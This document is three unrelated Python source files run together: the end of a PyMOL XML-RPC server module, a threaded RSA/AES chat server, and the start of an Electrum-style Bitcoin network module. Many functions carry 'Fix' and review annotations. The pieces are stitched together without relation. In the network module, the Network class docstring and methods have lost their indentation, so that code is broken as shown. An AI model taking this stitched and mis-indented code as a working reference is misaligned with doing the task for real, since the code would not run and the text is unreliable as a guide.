    cgoDict[id] = obj
    cmd.load_cgo(obj,id,1)
    return 1
def rpcRenderCGO(cgoV,id='cgo',extend=1):
    """ renders a CGO vector
    Arguments:
      cgoV: a vector of floats
      id: (OPTIONAL) the name of the object to be created
      extend: (OPTIONAL) if this is nonzero, the vector is appended to any
        CGO already stored under this id; if zero the object is rebuilt
        from scratch
    """
    if extend:
        obj = cgoDict.get(id,[])
    else:
        obj = []
    obj.extend(cgoV)
    # NOTE(review): unlike rpcSphere/rpcSpheres, the combined list is not
    # written back to cgoDict here — confirm whether that is intentional
    cmd.load_cgo(obj,id,1)
    return 1
def rpcSpheres(sphereD,id='cgo',extend=1):
    """ create a set of spheres
    Arguments:
      sphereD: a series of (pos,rad,color,transparent,transparency) tuples
      id: (OPTIONAL) the name of the object to be created
      extend: (OPTIONAL) if this is nonzero, the spheres are appended to any
        CGO already stored under this id; if zero the object is rebuilt
        from scratch
    """
    if extend:
        obj = cgoDict.get(id,[])
    else:
        obj = []
    # translate each tuple into CGO ops (optional ALPHA, then COLOR+SPHERE)
    for pos,rad,color,transparent,transparency in sphereD:
        r,g,b = color
        x,y,z = pos
        if not transparent:
            o = []
        else:
            o = [cgo.ALPHA,1-transparency]
        o.extend([cgo.COLOR,r,g,b,cgo.SPHERE,x,y,z,rad])
        obj.extend(o)
    # remember the full primitive list so later extend=1 calls can append
    cgoDict[id] = obj
    cmd.load_cgo(obj,id,1)
    return 1
def rpcCylinder(end1,end2,rad,color1,id='cgo',color2=None,extend=1,
                transparent=0,transparency=0.5):
    """ create a cylinder
    Arguments:
      end1: a 3 tuple with the position of end1 of the cylinder
      end2: a 3 tuple with the position of end2 of the cylinder
      rad: a float with the radius
      color1: a 3 tuple with the color of end1. (1,1,1) is white
      id: (OPTIONAL) the name of the object to be created
      color2: (OPTIONAL) a 3 tuple with the color of end2. (1,1,1)
        is white; defaults to color1
      extend: (OPTIONAL) if this is nonzero, the cylinder is appended to any
        CGO already stored under this id; if zero the object is rebuilt
        from scratch
      transparent: (OPTIONAL) sets the object to be transparent
      transparency: (OPTIONAL) the percent transparency of the object
    NOTE: the reason that color2 follows id is that I think clients are
    going to be interested in setting the id more often than they are going
    to care about the second color.
    """
    global cgoDict
    if color2 is None: color2 = color1
    r1,g1,b1 = color1
    r2,g2,b2 = color2
    x1,y1,z1 = end1
    x2,y2,z2 = end2
    if extend:
        obj = cgoDict.get(id,[])
    else:
        obj = []
    if not transparent:
        o = []
    else:
        # an ALPHA op applies to the primitives that follow it
        o = [cgo.ALPHA,1-transparency]
    o.extend([cgo.CYLINDER,x1,y1,z1,x2,y2,z2,rad,r1,g1,b1,r2,g2,b2,])
    obj.extend(o)
    cgoDict[id] = obj
    cmd.load_cgo(obj,id,1)
    return 1
def rpcDeleteObject(objName):
    """Delete the named PyMOL object.

    Returns 1 on success, 0 on failure. Fix: the bare `except` is narrowed
    to `except Exception` so interrupts (KeyboardInterrupt/SystemExit) are
    no longer swallowed.
    """
    try:
        cmd.delete(objName)
    except Exception:
        res = 0
    else:
        res = 1
    return res
def rpcDeleteAll():
    """Delete every object in the PyMOL session.

    Returns cmd.delete's result, or '' when it returns None (XML-RPC
    cannot marshal None without allow_none).
    """
    res = cmd.delete('all')
    return res if res is not None else ''
def colorObj(objName,colorScheme):
    """ sets an molecule's color scheme
    Arguments:
      - objName: the object (molecule) to change
      - colorScheme: name of the color scheme to use
        for the object (should be either 'std' or one of the
        color schemes defined in pymol.utils)
    Returns 1 when a scheme name was given, 0 otherwise.
    """
    if colorScheme:
        if colorScheme == 'std':
            # this is an adaptation of the cbag scheme from util.py, but
            # with a gray carbon.
            cmd.color("magenta","("+objName+")",quiet=1)
            cmd.color("oxygen","(elem O and "+objName+")",quiet=1)
            cmd.color("nitrogen","(elem N and "+objName+")",quiet=1)
            cmd.color("sulfur","(elem S and "+objName+")",quiet=1)
            cmd.color("hydrogen","(elem H and "+objName+")",quiet=1)
            cmd.color("gray","(elem C and "+objName+")",quiet=1)
        elif hasattr(utils,colorScheme):
            # NOTE(review): `utils` is not imported anywhere in this module
            # (the loaders import `util`), so any non-'std' scheme raises
            # NameError here — confirm the intended import.
            fn = getattr(utils,colorScheme)
            fn(objName,quiet=1)
        res = 1
    else:
        res = 0
    return res
def rpcLoadPDB(data,objName,colorScheme='',replace=1):
    """ loads a molecule from a pdb string
    Arguments:
      data: the pdb block
      objName: name of the object to create
      colorScheme: (OPTIONAL) name of the color scheme to use
        for the molecule (should be either 'std' or one of the
        color schemes defined in pymol.utils)
      replace: (OPTIONAL) if an object with the same name already
        exists, delete it before adding this one
    """
    # NOTE(review): `util` is imported but unused in this function
    from pymol import util
    if replace:
        cmd.delete(objName)
    res = cmd.read_pdbstr(data,objName)
    colorObj(objName,colorScheme)
    # XML-RPC cannot marshal None; substitute an empty string
    if res is not None:
        return res
    else:
        return ''
def rpcLoadMolBlock(data,objName,colorScheme='',replace=1):
    """ loads a molecule from a mol block
    Arguments:
      data: the mol block
      objName: name of the object to create
      colorScheme: (OPTIONAL) name of the color scheme to use
        for the molecule (should be either 'std' or one of the
        color schemes defined in pymol.utils)
      replace: (OPTIONAL) if an object with the same name already
        exists, delete it before adding this one
    """
    # NOTE(review): `util` is imported but unused in this function
    from pymol import util
    if replace:
        cmd.delete(objName)
    res = cmd.read_molstr(data,objName)
    colorObj(objName,colorScheme)
    # XML-RPC cannot marshal None; substitute an empty string
    if res is not None:
        return res
    else:
        return ''
def rpcLoadFile(fileName,objName='',format='',colorScheme='',replace=1):
    """ loads an object from a file
    Arguments:
      fileName: the file to load
      objName: (OPTIONAL) name of the object to create
      format: (OPTIONAL) the format of the input file
      colorScheme: (OPTIONAL) name of the color scheme to use
        for the object (should be either 'std' or one of the
        color schemes defined in pymol.utils)
      replace: (OPTIONAL) if an object with the same name already
        exists, delete it before adding this one
    """
    if not objName:
        # default object name: everything before the first '.' in the path
        objName = fileName.split('.')[0]
    if replace:
        cmd.delete(objName)
    res = cmd.load(fileName,objName,format=format)
    colorObj(objName,colorScheme)
    # XML-RPC cannot marshal None; substitute an empty string
    if res is not None:
        return res
    else:
        return ''
def rpcLoadSurface(fileName,objName,format='',surfaceLevel=1.0):
    """ loads surface data from a file and adds an isosurface
    Arguments:
      fileName: the file to load
      objName: (OPTIONAL) name of the object to create
      format: (OPTIONAL) the format of the input file
      surfaceLevel: (OPTIONAL) the isosurface level

    Bug fix: the caller-supplied `format` was previously ignored
    (cmd.load was always called with format='').
    """
    if not objName:
        # default object name: everything before the first '.' in the path
        objName = fileName.split('.')[0]
    gridName = 'grid-%s'%objName
    res = cmd.load(fileName,gridName,format=format)
    cmd.isosurface(objName,gridName,level=surfaceLevel)
    # XML-RPC cannot marshal None; substitute an empty string
    if res is not None:
        return res
    else:
        return ''
def rpcLoadSurfaceData(data,objName='surface',format='',surfaceLevel=1.0):
    """ loads surface data from a string and adds an isosurface
    Arguments:
      data: the data to load
      objName: (OPTIONAL) name of the object to create
      format: (OPTIONAL) the format of the input file
      surfaceLevel: (OPTIONAL) the isosurface level

    Fixes: tempfile.mktemp (race-prone, deprecated) replaced with mkstemp;
    the file handle is now closed deterministically; the temp file is
    removed even if loading fails; the `format` argument is forwarded.
    """
    # it would be nice if we didn't have to go by way of the temporary file,
    # but at the moment pymol will only read shapes from files
    fd, tempnm = tempfile.mkstemp('.grd')
    try:
        with os.fdopen(fd, 'w+') as handle:
            handle.write(data)
        res = rpcLoadSurface(tempnm,objName,format=format,surfaceLevel=surfaceLevel)
    finally:
        os.unlink(tempnm)
    if res is not None:
        return res
    else:
        return ''
def rpcRotate(vect,objName='',state=-1):
    """ rotates objects
    Arguments:
      - vect: a sequence with x y and z rotations (degrees)
      - objName: (OPTIONAL) object to be rotated
      - state: (OPTIONAL) if zero only visible states are rotated,
        if -1 (the default), all states are rotated
    """
    # apply the three axis rotations one after the other
    cmd.rotate('x',vect[0],objName,state=state)
    cmd.rotate('y',vect[1],objName,state=state)
    cmd.rotate('z',vect[2],objName,state=state)
    return 1
def rpcGetNames(what='selections',enabledOnly=1):
    """ returns the results of cmd.get_names(what)
    Arguments:
      - what: the category of names to list (e.g. 'selections', 'objects')
      - enabledOnly: restrict the listing to enabled entries
    """
    return cmd.get_names(what,enabled_only=enabledOnly)
def rpcIdAtom(what='all',mode=0):
    """ returns the results of cmd.id_atom(what)
    Arguments:
      - what: atom selection
      - mode: forwarded to cmd.id_atom's mode argument
    """
    return cmd.id_atom(what,mode=mode)
def rpcGetAtomCoords(what='all',state=0):
    """ returns the results of cmd.get_atom_coords(what,state)
    Arguments:
      - what: atom selection (must resolve to a single atom)
      - state: the state to read coordinates from
    """
    return cmd.get_atom_coords(what,state=state)
def rpcHelp(what=''):
    """ returns general help text or help on a particular command
    With no argument, returns the list of registered function names;
    otherwise reconstructs the function's signature from its code object
    and appends its docstring.
    """
    global serv
    res = 'Command Not Found'
    if not what:
        res = list(serv.funcs.keys())
    else:
        funcs = serv.funcs
        if what in funcs:
            fn = funcs[what]
            res = "Function: %s("%what
            defs = fn.__defaults__
            # NOTE(review): if the function has no defaults the signature is
            # left as "name(" with no closing paren — quirk of the original
            if defs:
                code = fn.__code__
                nDefs = len(defs)
                args = []
                # i = -1 so the default-arg loop below still works when
                # every argument has a default (the range above is empty)
                i = -1
                for i in range(code.co_argcount - nDefs):
                    args.append(code.co_varnames[i])
                for j in range(nDefs):
                    # defaulted args follow the positional ones in co_varnames
                    vName = code.co_varnames[j+i+1]
                    args.append("%s=%s"%(vName,repr(defs[j])))
                res += ','.join(args)
                res += ')\n'
            if fn.__doc__:
                res += fn.__doc__
    return res
def launch_XMLRPC(hostname='',port=_xmlPort,nToTry=_nPortsToTry):
    """ launches the xmlrpc server into a separate thread
    Arguments:
      hostname: (OPTIONAL) name of the host for the server
        (defaults to $PYMOL_RPCHOST or 'localhost')
      port: (OPTIONAL) the first port to try for the server
      nToTry: (OPTIONAL) the number of possible ports to try
        (in case the first can't be opened)

    Fixes: the bare `except` around server creation is narrowed to
    (OSError, IOError) — socket errors on both Python 2 and 3 — and the
    deprecated t.setDaemon(1) is replaced with t.daemon = True.
    """
    if not hostname:
        import os
        hostname = os.environ.get('PYMOL_RPCHOST', 'localhost')
    global cgoDict,serv
    cgoDict = {}
    serv = None
    # try successive ports until one can be bound
    for i in range(nToTry):
        try:
            serv = SimpleXMLRPCServer.SimpleXMLRPCServer((hostname,port+i),logRequests=0,
                                                         allow_none=True)
        except (OSError, IOError):  # port in use / permission denied
            serv = None
        else:
            break
    if serv:
        print('xml-rpc server running on host %s, port %d'%(hostname,port+i))
        # import PyMOL API
        from pymol import api
        serv.register_instance(cmd)
        # legacy stuff with unique names
        serv.register_function(rpcPing,'ping')
        serv.register_function(rpcResetCGO,'resetCGO')
        serv.register_function(rpcRenderCGO,'renderCGO')
        serv.register_function(rpcSphere,'sphere')
        serv.register_function(rpcSpheres,'spheres')
        serv.register_function(rpcCylinder,'cylinder')
        serv.register_function(rpcDeleteObject,'deleteObject')
        serv.register_function(rpcDeleteAll,'deleteAll')
        serv.register_function(rpcLoadPDB,'loadPDB')
        serv.register_function(rpcLoadMolBlock,'loadMolBlock')
        serv.register_function(rpcLoadSurface,'loadSurface')
        serv.register_function(rpcLoadSurfaceData,'loadSurfaceData')
        serv.register_function(rpcLoadFile,'loadFile')
        serv.register_function(rpcGetNames,'getNames')
        serv.register_function(api.count_atoms,'countAtoms')
        serv.register_function(rpcIdAtom,'idAtom')
        serv.register_function(rpcHelp,'help')
        serv.register_function(rpcGetAtomCoords,'getAtomCoords')
        # legacy stuff, should be removed because overwrites API names!
        serv.register_function(rpcLabel,'label') # pseudoatom
        serv.register_function(rpcRotate,'rotate')
        serv.register_introspection_functions()
        # serve in a daemon thread so PyMOL can exit normally
        t = threading.Thread(target=serv.serve_forever)
        t.daemon = True
        t.start()
    else:
        print('xml-rpc server could not be started')
# vi:expandtab:smarttab:sw=2
|
Server.py | #!/usr/bin/env python
import socket
import time
import random
import os
from threading import Thread
from Cryptodome.PublicKey import RSA
from Cryptodome.Cipher import PKCS1_OAEP
import ast
from AESCipher import AESCipher
import configparser
import argparse
def parse_config():
    """Load server settings from the [Server] section of the file named by
    the global `config_file`.

    Sets the globals privateKeyFile, port, max_users, debug and
    allow_encryption, falling back to the defaults below for any missing
    or malformed option, and prints which options failed to parse.

    Fixes: the bare `except` clauses are narrowed — KeyError for the
    missing section, ValueError for malformed int/boolean options (the
    exceptions configparser actually raises).
    """
    global privateKeyFile, port, max_users, debug, allow_encryption
    privateKeyFile_default = 'private.pem'
    port_default = 5006
    max_users_default = 2048
    debug_default = False
    config_file_default = 'server.ini'
    allow_encryption_default = True
    config = configparser.ConfigParser()
    config.read(config_file)
    section = "Server"
    try:
        config_server = config[section]
    except KeyError:
        # No [Server] section (file missing or malformed): use all defaults.
        privateKeyFile = privateKeyFile_default
        port = port_default
        max_users = max_users_default
        debug = debug_default
        allow_encryption = allow_encryption_default
        if config_file != config_file_default:
            # only warn when the user explicitly pointed at another file
            print("\nSomething wrong with config file ({}).\n".format(config_file))
        return
    errorWith = []
    privateKeyFile = config_server.get('privatekeyfile', privateKeyFile_default)
    try:
        port = config_server.getint('port', port_default)
    except ValueError:
        errorWith.append('port')
        port = port_default
    try:
        max_users = config_server.getint('maxusers', max_users_default)
    except ValueError:
        errorWith.append('maxusers')
        max_users = max_users_default
    try:
        allow_encryption = config_server.getboolean('allowencryption', allow_encryption_default)
    except ValueError:
        errorWith.append('allowencryption')
        allow_encryption = allow_encryption_default
    try:
        debug = config_server.getboolean('debug', debug_default)
    except ValueError:
        errorWith.append('debug')
        debug = debug_default
    if errorWith: print('\nErrors with loading [{}] from config file.\n'.format(', '.join(errorWith)))
def parse_args():
    """Parse command-line flags, overriding config-file settings.

    Fix: value-carrying options were tested for truthiness
    (``if args.port:``), so explicitly-passed falsy values were silently
    ignored; they are now compared against None.  The store_true flags
    (--dontencrypt, --debug) keep their truthiness checks, which is
    correct for booleans defaulting to False.
    """
    parser = argparse.ArgumentParser(description='Provides a dedicated server for Clients to connect to.\nAll settings here override the config file.')
    parser.add_argument('-p', '--port', type=int, help='Specify the port number to host on.', action='store')
    parser.add_argument('-m', '--maxusers', type=int, help='Specify the max number of users that can connect.', action='store')
    parser.add_argument('-pK', '--privatekey', help='Specify the private key to use.', action='store')
    parser.add_argument('-c', '--config', help='Specify the config file to use.', action='store')
    parser.add_argument('-dE', '--dontencrypt', help="Specify if clients shouldn't be able to use encryption when connecting.", action='store_true')
    parser.add_argument('-d', '--debug', help=argparse.SUPPRESS, action='store_true')
    args = parser.parse_args()
    global config_file, privateKeyFile, port, max_users, allow_encryption, debug
    if args.config is not None:
        # Re-read settings from the user-supplied config file first so the
        # remaining flags still take precedence over it.
        config_file = args.config
        parse_config()
    if args.privatekey is not None:
        privateKeyFile = args.privatekey
    if args.maxusers is not None:
        max_users = args.maxusers
    if args.port is not None:
        port = args.port
    if args.dontencrypt:
        allow_encryption = not args.dontencrypt
    if args.debug:
        debug = args.debug
def decryptRSA(encrypted):
    """Decrypt an RSA payload with the server's private key.

    The payload arrives as the textual repr of a bytes literal, so it is
    first evaluated back into real bytes before decryption.
    """
    cipher = PKCS1_OAEP.new(privateKey)
    return cipher.decrypt(ast.literal_eval(str(encrypted)))
def encryptRSA(decrypted):
    """RSA-encrypt bytes with the server's public key.

    Bug fix: the module never defines a ``publicKey`` global (startup only
    loads ``privateKey``), so the original body raised NameError whenever
    called.  Derive the public half from the loaded private key instead.
    """
    encryptor = PKCS1_OAEP.new(privateKey.publickey())
    encrypted = encryptor.encrypt(decrypted)
    return encrypted
def decryptAES(encrypted, key):
    """Decrypt *encrypted* with the per-client AES session *key*."""
    return AESCipher(key).decrypt(encrypted)
def encryptAES(decrypted, key):
    """Encrypt *decrypted* with the per-client AES session *key*."""
    return AESCipher(key).encrypt(decrypted)
def broadcast(message, senderID):
    """Send *message* to every connected client except the sender.

    Clients that completed an AES handshake receive the message encrypted
    with their session key; plaintext clients get it verbatim.

    Fix: iterate over a snapshot of the dict -- talk() threads add and
    remove entries concurrently, and mutating a dict while iterating it
    raises RuntimeError.
    """
    for eachID, eachConn in list(connections.items()):
        if eachID != senderID:
            if keys.get(eachID):
                eachConn.send(encryptAES(message, keys[eachID]))
            else:
                eachConn.send(message)
def hereList():
    """Return a human-readable roster of everyone currently connected."""
    roster = ', '.join(names.values())
    return "Here exists {}.".format(roster)
def getID():
    """Pick an unused random client ID in [0, max_users).

    Bug fix: IDs are stored in ``names`` as *strings* (talk() does
    ``ID = str(rand)``), but the original compared the raw int against the
    keys, so the collision check never matched and duplicate IDs were
    possible.  Compare the string form instead.
    """
    rand = random.randint(0, max_users - 1)
    while str(rand) in names:
        rand = random.randint(0, max_users - 1)
    return rand
def talk(conn, addr):
    """Per-client thread: handshake, register, then relay chat messages.

    Protocol: the client's first message is either an RSA-encrypted AES
    session key (followed by an AES-encrypted name) or a plaintext name.
    Afterwards every received line is broadcast to the other clients until
    the client sends an exit keyword or the socket errors out.
    """
    print("Opening connection with {}.".format(addr))
    try:
        rand = getID()
        ID = str(rand)
        connections[ID] = conn
        initialMessage = conn.recv(1024)
        try:
            # Path 1: encrypted handshake -- RSA-wrapped AES key, then name.
            key = decryptRSA(initialMessage)
            keys[ID] = key
            nameEnc = conn.recv(1024)
            name = decryptAES(nameEnc, key).decode('utf-8')
            if not allow_encryption:
                conn.send(encryptAES(b'Encryption is not allowed here.', key))
                return
        except ValueError as err:
            # Path 2: RSA decryption failed -- treat the first message as a
            # plaintext name instead.
            try:
                name = initialMessage.decode('utf-8')
            except Exception as err:
                print("Malformed input, kicking.")
                conn.send(b'Malformed input, kicking.')
                if debug:
                    print(err)
                return
        except Exception as err:
            print("Malformed input, kicking.")
            conn.send(b'Malformed input, kicking.')
            if debug:
                print(err)
            return
        names[ID] = name
        print("They are {} with the ID of {}.".format(name, ID))
        # Greet the newcomer with the roster, encrypted when possible.
        if keys.get(ID):
            conn.send(encryptAES(hereList().encode('utf-8'), key))
        else:
            conn.send(hereList().encode('utf-8'))
        broadcast("{} has joined.".format(name).encode('utf-8'), ID)
        while True:
            try:
                if keys.get(ID):
                    dataEnc = conn.recv(1024)
                    data = decryptAES(dataEnc, key)
                else:
                    data = conn.recv(1024)
            except Exception as err:
                # Receive/decrypt failure is treated as a disconnect.
                print("Error Receiving")
                data = b'exit'
                if debug:
                    print(err)
            if data == b'I am out.' or data == b'exit' or data == b'quit':
                break
            elif data == b'who':
                if keys.get(ID):
                    conn.send(encryptAES(hereList().encode('utf-8'), key))
                else:
                    conn.send(hereList().encode('utf-8'))
            elif data:
                message = "{}> {}".format(name, data.decode('utf-8'))
                message = message.encode('utf-8')
                broadcast(message, ID)
            else:
                # NOTE(review): empty data usually means the peer closed the
                # socket; this branch still broadcasts an empty chat line
                # instead of breaking -- confirm that is intended.
                message = "{}> {}".format(name, data.decode('utf-8'))
                message = message.encode('utf-8')
                broadcast(message, ID)
    finally:
        # Best-effort cleanup: the client may never have registered fully,
        # in which case name/key lookups below can fail.
        try:
            if connections.get(ID):
                del connections[ID]
            if keys.get(ID):
                del keys[ID]
            if names.get(ID):
                del names[ID]
            print("Closed connection with {}.".format(addr))
            print("They were {} with the ID of {}.".format(name, ID))
            message = "{} has left.".format(name).encode('utf-8')
            broadcast(message, ID)
        except Exception as err:
            print("Some kind of error in cleaning up that connection. They probably didn't have a name or key.")
            if debug:
                print(err)
        conn.close()
def listening():
    """Accept connections forever, handing each socket to a talk() thread."""
    while True:
        conn, addr = s.accept()
        worker = Thread(target=talk, args=(conn, addr))
        worker.start()
if __name__ == "__main__":
    print("SERVER")
    # Settings are resolved in order: defaults -> config file -> CLI flags.
    config_file = "server.ini"
    parse_config()
    parse_args()
    if debug:
        print("DEBUG")
        #exit()
    # Listen on every interface with a small accept backlog.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0",port))
    s.listen(5)
    # The RSA private key is used to unwrap each client's AES session key.
    with open(privateKeyFile, "r") as file:
        privateKeyString = file.read()
        privateKey = RSA.import_key(privateKeyString)
    # Shared state keyed by client ID string: socket, display name, AES key.
    connections = {}
    names = {}
    keys = {}
    # The accept loop runs as a daemon so Ctrl+C in the main thread wins.
    thread = Thread(target=listening)
    thread.daemon = True
    thread.start()
    try:
        while True:
            time.sleep(100)
    except KeyboardInterrupt:
        s.close()
        print("Closing Server")
        exit()
network.py | # Electrum - Lightweight Bitcoin Client
# Copyright (c) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import json
import errno
import queue
import random
import select
import socket
import threading
import time
from collections import defaultdict
import re
import socks
from . import bitcoin
from . import blockchain
from . import util
from .btn import *
from . import constants
from .interface import Connection, Interface
from .version import ELECTRUM_VERSION, PROTOCOL_VERSION
# Seconds before previously-failed peer servers are retried (see maintain_sockets).
NODES_RETRY_INTERVAL = 60
# Seconds before the user's chosen default server is retried after a failure.
SERVER_RETRY_INTERVAL = 10
def parse_servers(result):
    """Parse a server.peers.subscribe result list into {host: portmap} form.

    Each item looks like [ip, hostname, [feature, ...]] where features are
    strings such as 's50002' (ssl port), 't50001' (tcp port), 'v1.2'
    (version) and 'p100' (pruning level).  Hosts advertising no usable
    port are dropped.

    Fix: regex patterns containing ``\\d`` are now raw strings; the
    originals relied on an invalid escape sequence that is deprecated in
    modern Python.
    """
    servers = {}
    for item in result:
        host = item[1]
        out = {}
        version = None
        pruning_level = '-'
        if len(item) > 2:
            for v in item[2]:
                if re.match(r"[st]\d*", v):
                    protocol, port = v[0], v[1:]
                    if port == '':
                        # No explicit port: use the network default for it.
                        port = constants.net.DEFAULT_PORTS[protocol]
                    out[protocol] = port
                elif re.match(r"v(.?)+", v):
                    version = v[1:]
                elif re.match(r"p\d*", v):
                    pruning_level = v[1:]
                    if pruning_level == '':
                        pruning_level = '0'
        if out:
            out['pruning'] = pruning_level
            out['version'] = version
            servers[host] = out
    return servers
def filter_version(servers):
    """Keep only servers advertising a recent-enough protocol version."""
    def is_recent(version):
        try:
            return util.normalize_version(version) >= util.normalize_version(PROTOCOL_VERSION)
        except Exception:
            # Unparseable or missing version: treat as too old.
            return False
    recent = {}
    for server, portmap in servers.items():
        if is_recent(portmap.get('version')):
            recent[server] = portmap
    return recent
def filter_protocol(hostmap, protocol='s'):
    '''Filters the hostmap for those implementing protocol.
    The result is a list in serialized form.'''
    return [serialize_server(host, portmap[protocol], protocol)
            for host, portmap in hostmap.items()
            if portmap.get(protocol)]
def pick_random_server(hostmap=None, protocol='s', exclude_set=frozenset()):
    """Choose a random eligible server string, or None if none qualify.

    Fix: ``exclude_set`` defaulted to a mutable ``set()``, which Python
    evaluates once and shares across calls -- a latent bug should anyone
    mutate it.  An immutable frozenset keeps the same semantics safely.
    """
    if hostmap is None:
        hostmap = constants.net.DEFAULT_SERVERS
    eligible = list(set(filter_protocol(hostmap, protocol)) - exclude_set)
    return random.choice(eligible) if eligible else None
# NOTE(review): mid-file import -- presumably to avoid a circular import at
# module load; confirm before moving it to the top of the file.
from .simple_config import SimpleConfig
# Order matters: set_proxy() maps list index + 1 onto the socks module's
# proxy-type constants.
proxy_modes = ['socks4', 'socks5', 'http']
def serialize_proxy(p):
    """Flatten a proxy dict into 'mode:host:port:user:password', or None."""
    if not isinstance(p, dict):
        return None
    fields = [p.get('mode'), p.get('host'), p.get('port'),
              p.get('user', ''), p.get('password', '')]
    return ':'.join(fields)
def deserialize_proxy(s):
    """Parse 'mode:host:port:user:password' (any suffix optional) into a dict.

    Returns None for non-strings and for the literal string 'none'.
    Missing fields fall back to socks5 on localhost with the mode's
    conventional port (8080 for http, 1080 otherwise).
    """
    if not isinstance(s, str):
        return None
    if s.lower() == 'none':
        return None
    proxy = {"mode": "socks5", "host": "localhost"}
    remaining = s.split(':')
    if remaining and remaining[0] in proxy_modes:
        proxy["mode"] = remaining.pop(0)
    if remaining:
        proxy["host"] = remaining.pop(0)
    if remaining:
        proxy["port"] = remaining.pop(0)
    else:
        proxy["port"] = "8080" if proxy["mode"] == "http" else "1080"
    if remaining:
        proxy["user"] = remaining.pop(0)
    if remaining:
        proxy["password"] = remaining.pop(0)
    return proxy
def deserialize_server(server_str):
    """Split 'host:port:protocol' back into (host, port, protocol).

    The protocol must be 's' or 't'; the port must be numeric but is
    returned as a string.
    """
    host, port, protocol = str(server_str).rsplit(':', 2)
    assert protocol in 'st'
    int(port)  # raises ValueError if the port is not numeric
    return host, port, protocol
def serialize_server(host, port, protocol):
    """Join (host, port, protocol) into the canonical 'host:port:protocol'."""
    return ':'.join((host, port, protocol))
class Network(util.DaemonThread):
"""The Network class manages a set of connections to remote btn_electrum
servers, each connected socket is handled by an Interface() object.
Connections are initiated by a Connection() thread which stops once
the connection succeeds or fails.
Our external API:
- Member functions get_header(), get_interfaces(), get_local_height(),
get_parameters(), get_server_height(), get_status_value(),
is_connected(), set_parameters(), stop()
"""
def __init__(self, config=None):
    """Set up connection bookkeeping and kick off the first connections.

    *config* may be a SimpleConfig, a plain dict of options, or None.
    """
    if config is None:
        config = {}  # Do not use mutables as default values!
    util.DaemonThread.__init__(self)
    self.config = SimpleConfig(config) if isinstance(config, dict) else config
    # 'oneserver' mode disables the random-peer pool entirely.
    self.num_server = 10 if not self.config.get('oneserver') else 0
    self.blockchains = blockchain.read_blockchains(self.config)
    self.print_error("blockchains", self.blockchains.keys())
    self.blockchain_index = config.get('blockchain_index', 0)
    if self.blockchain_index not in self.blockchains.keys():
        self.blockchain_index = 0
    # Server for addresses and transactions
    self.default_server = self.config.get('server', None)
    # Sanitize default server
    if self.default_server:
        try:
            deserialize_server(self.default_server)
        except:
            self.print_error('Warning: failed to parse server-string; falling back to random.')
            self.default_server = None
    if not self.default_server:
        self.default_server = pick_random_server()
    self.lock = threading.Lock()
    self.pending_sends = []
    self.message_id = 0
    self.debug = False
    self.irc_servers = {}  # returned by interface (list from irc)
    self.recent_servers = self.read_recent_servers()
    self.banner = ''
    self.donation_address = ''
    self.relay_fee = None
    # callbacks passed with subscriptions
    self.subscriptions = defaultdict(list)
    self.sub_cache = {}
    # callbacks set by the GUI
    self.callbacks = defaultdict(list)
    self.downloading_headers = False
    # Per-server certificates are cached under the config directory.
    dir_path = os.path.join(self.config.path, 'certs')
    util.make_dir(dir_path)
    # subscriptions and requests
    self.subscribed_addresses = set()
    self.subscribed_tokens = set()
    self.h2addr = {}  # scripthash -> address, for response translation
    # Requests from client we've not seen a response to
    self.unanswered_requests = {}
    # retry times
    self.server_retry_time = time.time()
    self.nodes_retry_time = time.time()
    # kick off the network. interface is the main server we are currently
    # communicating with. interfaces is the set of servers we are connecting
    # to or have an ongoing connection with
    self.interface = None
    self.interfaces = {}
    self.auto_connect = self.config.get('auto_connect', True)
    self.connecting = set()
    self.requested_chunks = set()
    self.socket_queue = queue.Queue()
    self.start_network(deserialize_server(self.default_server)[2],
                       deserialize_proxy(self.config.get('proxy')))
def register_callback(self, callback, events):
    """Subscribe *callback* to each event name in *events*."""
    with self.lock:
        for event_name in events:
            self.callbacks[event_name].append(callback)
def unregister_callback(self, callback):
    """Remove *callback* from every event it was registered for."""
    with self.lock:
        for registered in self.callbacks.values():
            if callback in registered:
                registered.remove(callback)
def trigger_callback(self, event, *args):
    """Invoke every callback registered for *event*.

    The list is copied under the lock so callbacks may (un)register while
    running; the calls themselves happen outside the lock.

    Fix: the original used a throwaway list comprehension for its side
    effects; a plain loop expresses the intent without building a list.
    """
    with self.lock:
        callbacks = self.callbacks[event][:]
    for callback in callbacks:
        callback(event, *args)
def read_recent_servers(self):
    """Load the recently-used server list from the config dir, or [].

    Fix: the bare ``except:`` is narrowed to the errors this can actually
    hit -- OSError for a missing/unreadable file and ValueError (which
    json.JSONDecodeError subclasses) for corrupt contents.
    """
    if not self.config.path:
        return []
    path = os.path.join(self.config.path, "recent_servers")
    try:
        with open(path, "r", encoding='utf-8') as f:
            return json.loads(f.read())
    except (OSError, ValueError):
        # No history yet, or unreadable history: start fresh.
        return []
def save_recent_servers(self):
    """Persist the recently-used server list; best-effort.

    Fix: narrow the silent ``except: pass`` to OSError -- disk failures
    are the only thing we deliberately ignore here; anything else should
    surface.
    """
    if not self.config.path:
        return
    path = os.path.join(self.config.path, "recent_servers")
    s = json.dumps(self.recent_servers, indent=4, sort_keys=True)
    try:
        with open(path, "w", encoding='utf-8') as f:
            f.write(s)
    except OSError:
        # Persisting history is non-critical.
        pass
def get_server_height(self):
    """Return the tip height reported by the main interface (0 if offline)."""
    return self.interface.tip if self.interface else 0
def server_is_lagging(self):
    """Return True when the main server's tip is behind our local chain.

    Also prunes blockchains that have become invalid, closing any
    interfaces still following them.
    """
    sh = self.get_server_height()
    if not sh:
        self.print_error('no height for main interface')
